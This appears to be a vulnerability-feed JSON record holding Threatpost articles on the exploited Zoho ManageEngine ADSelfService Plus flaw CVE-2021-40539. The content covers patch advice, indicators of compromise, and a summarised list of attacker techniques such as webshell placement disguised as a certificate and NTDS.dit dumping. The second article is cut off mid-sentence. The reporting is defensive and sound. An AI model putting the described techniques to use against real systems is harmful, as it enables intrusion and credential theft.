{"id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "type": "threatpost", "bulletinFamily": "info", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "published": "2021-09-09T12:58:48", "modified": "2021-09-09T12:58:48", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "reporter": "Tara Seals", "references": ["https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://twitter.com/voodoodahl1/status/1435673342925737991", "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "https://nvd.nist.gov/vuln/detail/CVE-2020-10189", "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", "https://t.co/rIfxxeBlmO", "https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw", "https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/", "https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar", "https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar", "https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar"], "cvelist": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"], "immutableFields": [], "lastseen": "2021-09-09T15:34:54", "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0118", "CPAI-2021-0548", "CPAI-2021-0879"]}, {"type": "cisa", "idList": ["CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cve", "idList": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243"]}, {"type": "fireeye", "idList": ["FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "githubexploit", "idList": ["00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "84D5F04A-0DDB-5788-8759-DA99D303B756", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A9A21055-01FA-5B3E-84B3-E294A9641418", "B16D26DB-D60C-5C0C-9452-80112720B442", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "EF37F62F-1579-535A-9C3E-49B080F41CAC"]}, {"type": "hivepro", "idList": ["HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD"]}, {"type": "krebs", "idList": ["KREBS:69ADDAD13D83673CDE629B3AD655DD29"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION/", "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156730", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165085"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "thn", "idList": ["THN:080602C4CECD29DACCA496697978CAD0", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:D0F9B64B55AE6B07B3B0C0540189389E", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F076354512CA34C263F222F3D62FCB1E"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34095", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37080"]}]}, "score": {"value": 5.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0118", "CPAI-2021-0548"]}, {"type": "cisa", "idList": ["CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cve", "idList": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243"]}, {"type": "fireeye", "idList": ["FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "githubexploit", "idList": ["00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "84D5F04A-0DDB-5788-8759-DA99D303B756", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A9A21055-01FA-5B3E-84B3-E294A9641418", "B16D26DB-D60C-5C0C-9452-80112720B442", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "CE477D7E-7586-5C82-8DCC-033C48461E66", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "EF37F62F-1579-535A-9C3E-49B080F41CAC"]}, {"type": "hivepro", "idList": ["HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD"]}, {"type": "krebs", "idList": ["KREBS:69ADDAD13D83673CDE629B3AD655DD29"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156730", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165085"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "thn", "idList": ["THN:080602C4CECD29DACCA496697978CAD0", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:D0F9B64B55AE6B07B3B0C0540189389E", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F076354512CA34C263F222F3D62FCB1E"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:BC99709891AA93FC7767B53445FC2736"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0"]}, {"type": "zdt", "idList": ["1337DAY-ID-34095", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37080"]}]}, "exploitation": null, "vulnersScore": 5.8}, "_state": {"dependencies": 1647589307, "score": 0}}

{"threatpost": [{"lastseen": "2021-09-16T21:32:23", "description": "The FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) warned today that state-backed advanced persistent threat (APT) actors are likely among those who\u2019ve been actively exploiting a newly identified bug in a Zoho single sign-on and password management tool since early last month.\n\nAt issue is a critical authentication bypass vulnerability in Zoho ManageEngine ADSelfService Plus platform that can lead to remote code execution (RCE) and thus open the corporate doors to attackers who can run amok, with free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nLast Tuesday, [Zoho issued a patch](<http://cve-2021-40539>) \u2013 [Zoho ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) \u2013 for the flaw, which is tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) with a 9.8 severity rating. As the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) at the time, it was being actively exploited in the wild as a zero-day.\n\nAccording to today\u2019s [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) from the three government cybersecurity arms \u2013 FBI, CISA and CGCYBER \u2013 the exploits pose \u201ca serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\u201d\n\nYou can see why: Successful exploitation of a lynchpin piece of security like a SSO and password handler could lay out a welcome mat for adversaries. Specifically, as the advisory iterated, an adversary could use the vulnerability to pry open security defenses in order to compromise admin credentials, move laterally through the network, and exfiltrate registry hives and AD files.\n\nThat\u2019s of concern to any business, but with Zoho, we\u2019re talking about a security solution that\u2019s used by critical infrastructure companies, U.S.-cleared defense contractors and academic institutions, among others.\n\nThe joint advisory said that APT groups have in fact targeted such entities in multiple industries, including transportation, IT, manufacturing, communications, logistics and finance.\n\n\u201cIllicitly obtained access and information may disrupt company operations and subvert U.S. research in multiple sectors,\u201d the advisory noted. \u201cSuccessful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\u201d\n\n## Confirming Exploits May Be Tough\n\nSuccessful attacks have been uploading a .zip file containing a JavaServer Pages (JSP) webshell \u2013 accessible at /help/admin-guide/Reports/ReportGenerate.jsp \u2013 pretending to be an x509 certificate, service.cer. Next come requests to different API endpoints to further exploit the targeted system.\n\nThe next step in the exploit is lateral movement using Windows Management Instrumentation (WMI), gaining access to a domain controller, dumping of NTDS.dit and SECURITY/SYSTEM registry hives, and then, from there, further compromised access.\n\n\u201cConfirming a successful compromise of ManageEngine ADSelfService Plus may be difficult,\u201d the security agencies advised, given that the attackers are running clean-up scripts designed to rub out their tracks by removing traces of the initial point of compromise and by obscuring any relationship between the exploitation of CVE-2021-40539 and the webshell.\n\nThe advisory provided this laundry list of tactics, techniques and processes (TTP) being used by threat actors to exploit the vulnerability:\n\n * WMI for lateral movement and remote code execution (wmic.exe)\n * Using plaintext credentials acquired from compromised ADSelfService Plus host\n * Using pg_dump.exe to dump ManageEngine databases\n * Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives\n * Exfiltration through webshells\n * Post-exploitation activity conducted with compromised U.S. infrastructure\n * Deleting specific, filtered log lines\n\n## Mitigations\n\nOrganizations that detect indicators of compromise (IoC) around their ManageEngine ADSelfService Plus installations \u201cshould take action immediately,\u201d the trio of agencies instructed.\n\n\u201cFBI, CISA, and CGCYBER strongly urge users and administrators to update to ADSelfService Plus build 6114,\u201d the trio stated. They also strongly urged organizations to keep ADSelfService Plus away from direct access via the internet.\n\nThey\u2019re also strongly recommending domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## This One Will Hurt\n\nJake Williams, co-founder and CTO at incident response firm BreachQuest, said that organizations should take note of the fact that threat actors have been using webshells as a post-exploitation payload. In the case of the exploitation of this Zoho flaw, they\u2019re using webshells disguised as certificates: something that security teams should be able to pick up on in web server logs, but \u201conly if organizations have a plan for detection.\u201d\n\nNo time like the present to start, he told Threatpost on Thursday: \u201cGiven that this will certainly not be the last vulnerability that results in web shell deployment, organizations are advised to baseline normal behavior in their web server logs so they can quickly discover when a web shell has been deployed.\u201d\n\nFinding a critical vulnerability in the system intended to help your employees manage and reset their passwords is \u201cexactly as bad as it sounds,\u201d noted Oliver Tavakoli, CTO at cybersecurity firm Vectra. \u201cEven if the ADSelfService Plus server was not accessible from the internet, it would be accessible from any compromised laptop. Recovery will be expensive \u2013 \u2018domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets\u2019 are certainly disruptive by themselves, and the APT groups may have established other means of persistence in the intervening time.\u201d\n\nThis ManageEngine vulnerability is the fifth instance of similarly critical vulnerabilities from ManageEngine this year, noted Sean Nikkel, senior cyber threat intel analyst at digital risk protection provider Digital Shadows. Unfortunately but predictably, given how much access attackers can get out of exploiting a vulnerability like this, we can likely expert more widespread exploitation of this and previous bugs, \u201cgiven the interactivity with Microsoft system processes.\u201d\n\nNikkel continued with yet another gloomy prediction: \u201cThe observation that APT groups are actively exploiting CVE-2021-40539 should highlight the potential exposure it might cause. If trends are consistent, extortion groups will likely seek exploitation for ransomware activity in the not-so-distant future,\u201d he mused.\n\nAll of which points to what CISA et al. have been urging about these vulnerabilities: namely, patch fast. \u201cUsers of Zoho\u2019s software should apply patches immediately to avoid the types of compromise described in the CISA bulletin,\u201d Nikkel said.\n\n## See Something, Say Something\n\nOrganizations should immediately report any of the following to [CISA](<https://us-cert.cisa.gov/report>) or the FBI:\n\n * Identification of IoC as outlined in the advisory.\n * Presence of webshell code on compromised ManageEngine ADSelfService Plus servers.\n * Unauthorized access to or use of accounts.\n * Evidence of lateral movement by malicious actors with access to compromised systems.\n * Other indicators of unauthorized access or compromise.\n\nHere are the reporting instructions:\n\n * Contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, include the incident date, time and location; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n * To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.\n * To report cyber incidents to the Coast Guard contact the USCG National Response Center (NRC). Phone: 1-800-424-8802, email: NRC@uscg.mil.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is 